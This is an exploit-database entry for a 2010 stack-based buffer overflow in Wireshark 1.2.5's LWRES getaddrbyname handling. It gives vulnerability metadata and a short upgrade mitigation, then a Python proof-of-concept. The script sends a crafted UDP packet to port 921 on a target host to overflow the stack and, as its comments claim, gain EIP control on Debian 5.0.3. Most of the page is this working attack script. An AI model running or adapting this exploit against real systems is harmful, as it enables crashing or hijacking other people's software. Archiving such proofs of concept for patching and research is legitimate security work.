Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow PoC

vendor:

Wireshark

by:

babi

7,8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Wireshark

Affected Version From: 1.2.5

Affected Version To: 1.2.5

Patch Exists: YES

Related CWE: N/A

CPE: //a:wireshark:wireshark:1.2.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian 5.0.3

2010

Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow PoC

This PoC exploits a stack-based buffer overflow vulnerability in Wireshark 1.2.5. It sends a crafted packet to the LWRES service on port 921, which contains a large amount of data that overwrites the stack and allows control over EIP on Debian 5.0.3.

Mitigation:

Upgrade to the latest version of Wireshark.

Source

Exploit-DB raw data:

#!/usr/bin/env python

# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow PoC
# with control over EIP on Debian 5.0.3
# by babi <bbbbaaaabbbbiiii@operamail.com> on 29 Jan 2010
# get it at http://www.wireshark.org/download/src/all-versions/wireshark-1.2.5.tar.gz

import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  exit(2)

port = 921
addr = (host, port)

leng = 380
high = int(leng / 256)
low = leng & 255

data  = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x00\x00\x01"
data += chr(high) + chr(low) + ("B" * leng) + "\x00\x00"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  exit(1)

udps.close()
exit(0)